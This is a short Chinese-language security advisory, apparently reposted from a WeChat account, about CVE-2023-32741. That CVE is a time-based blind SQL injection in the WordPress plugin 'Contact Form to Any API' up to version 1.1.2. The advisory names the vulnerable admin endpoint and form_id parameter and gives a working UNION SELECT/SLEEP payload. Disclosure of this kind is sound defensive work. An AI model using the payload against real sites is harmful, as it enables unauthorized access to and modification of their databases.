软件链接:https://wordpress.org/plugins/contact-form-to-any-api/
# 版本:1.1.2
# 测试平台:Windows、Linux
CVE 编号:CVE-2023-32741
# 产品描述
Contact form 7 to Any API 是最强大的插件,可将 cf7 数据发送到任何第三方服务。它可用于将数据发送到 CRM 或任何 REST API。易于使用且用户友好的设置。它还使用搜索和将数据导出到 csv 或 excel 等高级功能将 Contact Form 7 表单提交的数据保存到数据库。
![CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞](http://cn-sec.com/wp-content/uploads/2024/08/10-1724637481.png "CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞")
# 漏洞概述
Wordpress 插件 Contact Form to Any API <= 1.1.2 容易受到盲 SQL 注入 (基于时间) 攻击,该攻击通过 /wp-admin/edit.php 端点上的 form_id 参数进行。此漏洞可能导致未经授权的数据访问和修改。
概念证明
受影响的端点:/wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=
受影响的参数:form_id
有效载荷:1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)---
原文始发于微信公众号(云梦安全):CVE-2023-32741-[WordPress] 联系表单 - SQL 注入漏洞
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论